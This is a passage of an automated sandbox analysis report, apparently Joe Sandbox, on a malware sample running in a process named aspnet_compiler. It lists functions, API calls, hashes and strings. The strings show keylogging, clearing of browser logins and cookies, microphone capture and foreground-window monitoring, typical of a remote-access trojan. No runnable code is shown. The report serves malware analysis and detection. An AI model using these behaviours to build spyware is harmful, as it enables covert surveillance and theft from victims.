                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                          • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                          • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                          • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                          Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                          • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                          • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                          • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                          Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                          • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 3360349984-0
                                                          • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                          • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                          • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                          • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                          Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                          • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                          • API String ID: 3472027048-1236744412
                                                          • Opcode ID: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                          • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                          • Opcode Fuzzy Hash: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                          • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                          Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                            • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                            • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                          • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQuerySleepValue
                                                          • String ID: @CG$exepath$BG
                                                          • API String ID: 4119054056-3221201242
                                                          • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                          • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                          • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                          • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                          Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                            • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                            • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                          • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                          • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$ForegroundLength
                                                          • String ID: [ $ ]
                                                          • API String ID: 3309952895-93608704
                                                          • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                          • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                          • Opcode Fuzzy Hash: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                          • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                          Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                          • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandlePointerWrite
                                                          • String ID:
                                                          • API String ID: 3604237281-0
                                                          • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                          • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                          • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                          • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                          Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                          • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                          • Opcode Fuzzy Hash: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                          • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                          Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                          • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                          • Opcode Fuzzy Hash: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                          • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                          Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                            • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                            • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                          • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                          • String ID:
                                                          • API String ID: 737400349-0
                                                          • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                          • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                          • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                          • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                          Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B66C
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B67A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 3919263394-0
                                                          • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                          • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                          • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                          • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                          Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                          • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                          • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                          • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID:
                                                          • API String ID: 4116985748-0
                                                          • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                          • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                          • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                          • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                          Function 0041B37D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcess
                                                          • String ID:
                                                          • API String ID: 39102293-0
                                                          • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                          • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                          • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                          • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                          Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountEventTick
                                                          • String ID: >G
                                                          • API String ID: 180926312-1296849874
                                                          • Opcode ID: ed7abf5ed144e69c3d2872f5d5d6cab4558b4505d3eee695e95c0055fa3f6914
                                                          • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                          • Opcode Fuzzy Hash: ed7abf5ed144e69c3d2872f5d5d6cab4558b4505d3eee695e95c0055fa3f6914
                                                          • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                          Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID: $fD
                                                          • API String ID: 1807457897-3092946448
                                                          • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                          • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                          • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                          • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                          Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ACP$OCP
                                                          • API String ID: 0-711371036
                                                          • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                          • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                          • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                          • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                          Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 481472006-1507639952
                                                          • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                          • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                          • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                          • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                          Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                          • API String ID: 481472006-2430845779
                                                          • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                          • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                          • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                          • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                          Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: alarm.wav$xIG
                                                          • API String ID: 1174141254-4080756945
                                                          • Opcode ID: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                          • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                          • Opcode Fuzzy Hash: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                          • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                          Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                          • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                          • String ID: Online Keylogger Stopped
                                                          • API String ID: 1623830855-1496645233
                                                          • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                          • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                          • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                          • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                          Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                          • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferHeaderPrepare
                                                          • String ID: T=G
                                                          • API String ID: 2315374483-379896819
                                                          • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                          • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                          • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                          • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                          Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocaleValid
                                                          • String ID: IsValidLocaleName$j=D
                                                          • API String ID: 1901932003-3128777819
                                                          • Opcode ID: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                          • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                          • Opcode Fuzzy Hash: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                          • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                          Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: T=G$T=G
                                                          • API String ID: 3519838083-3732185208
                                                          • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                          • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                          • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                          • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                          Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                            • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                            • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                            • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                            • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                            • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                            • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
